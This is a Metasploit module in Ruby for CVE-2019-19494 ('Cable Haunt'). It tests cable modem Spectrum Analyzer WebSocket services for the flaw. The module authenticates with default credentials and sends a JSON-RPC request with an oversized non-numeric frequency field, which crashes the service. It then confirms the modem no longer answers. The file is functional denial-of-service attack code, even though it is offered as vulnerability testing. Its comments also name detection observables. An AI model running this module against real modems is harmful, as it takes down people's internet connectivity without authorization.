Path: blob/master/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
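##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'eventmachine'
require 'faye/websocket'

# Auxiliary module that tests a cable modem's Spectrum Analyzer WebSocket
# interface for CVE-2019-19494 ("Cable Haunt") by checking whether the web
# service stops answering after an oversized JSON-RPC parameter is sent.
#
# The module metadata declares the impact: the service is taken down
# (CRASH_SERVICE_DOWN) and the attempt leaves indicators in logs (IOC_IN_LOGS).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] metadata merged into the module's own via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',
        'Description' => %q{
          There exists a buffer overflow vulnerability in certain
          Cable Modem Spectrum Analyzer interfaces. This overflow
          is exploitable, but since an exploit would differ between
          every make, model, and firmware version (which also
          differs from ISP to ISP), this module simply causes a
          Denial of Service to test if the vulnerability is present.
        },
        'Author' => [
          'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC
          'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC
          'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC
          'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC
          'Nicholas Starke' # msf module
        ],
        'References' => [
          ['CVE', '2019-19494'],
          ['EDB', '47936'],
          ['URL', 'https://cablehaunt.com/'],
          ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']
        ],
        'DisclosureDate' => '2020-01-07',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST('192.168.100.1'),
        Opt::RPORT(8080),
        OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']),
        OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']),
        # The reachability check in #run fires 10 seconds in. A TIMEOUT below
        # that stops the reactor before the check runs, and the run then ends
        # with 'Unknown failure occurred'.
        OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15])
      ]
    )

    # The WebSocket URL built in #run is always ws:// (unencrypted), so the
    # proxy, virtual-host and SSL options are withdrawn.
    deregister_options('Proxies')
    deregister_options('VHOST')
    deregister_options('SSL')
  end

  # Runs the test: authenticate over HTTP, open the WebSocket, send one
  # oversized JSON-RPC request, then probe whether the web service still
  # answers.
  #
  # Fails via fail_with when the service cannot be reached, the credentials
  # are rejected, the WebSocket send fails, or the host is still reachable
  # after the request.
  def run
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/',
      'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD'])
    })

    fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?
    fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200

    @succeeded = false
    EM.run do
      print_status("Attempting Connection to #{datastore['RHOST']}")

      driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])

      driver.on :open do
        print_status('Opened connection')

        EM::Timer.new(1) do
          print_status('Sending payload')
          # fStartHz carries a 7000-8000 character alphanumeric string where
          # its sibling fStopHz is an integer. An oversized, non-numeric
          # frequency field in this RPC is the observable a detection rule or
          # an input-validating firmware fix can key on.
          payload = Rex::Text.rand_text_alphanumeric(7000..8000)
          driver.send({
            jsonrpc: '2.0',
            method: 'Frontend::GetFrontendSpectrumData',
            params: {
              coreID: 0,
              fStartHz: payload,
              fStopHz: 1000000000,
              fftSize: 1024,
              gain: 1
            },
            id: '0'
          }.to_json)
        rescue StandardError
          fail_with(Failure::Unreachable, 'Could not establish websocket connection')
        end
      end

      EM::Timer.new(10) do
        print_status('Checking Modem Status')

        # Only the probe itself is guarded. Previously the "still reachable"
        # fail_with sat inside the same begin/rescue StandardError; since
        # fail_with reports by raising (presumably a StandardError subclass,
        # confirm against the framework), the rescue swallowed it and a modem
        # that was still reachable was recorded as unreachable: a false
        # positive for the vulnerability.
        probe = begin
          send_request_cgi({
            'method' => 'GET',
            'uri' => '/'
          })
        rescue StandardError
          nil
        end

        fail_with(Failure::Unknown, 'Host still reachable') unless probe.nil?

        @succeeded = true
        print_status('Cable Modem unreachable')
      end

      EM::Timer.new(datastore['TIMEOUT']) do
        EventMachine.stop
        if @succeeded
          print_good('Exploit delivered and cable modem unreachable.')
        else
          fail_with(Failure::Unknown, 'Unknown failure occurred')
        end
      end
    end
  end
end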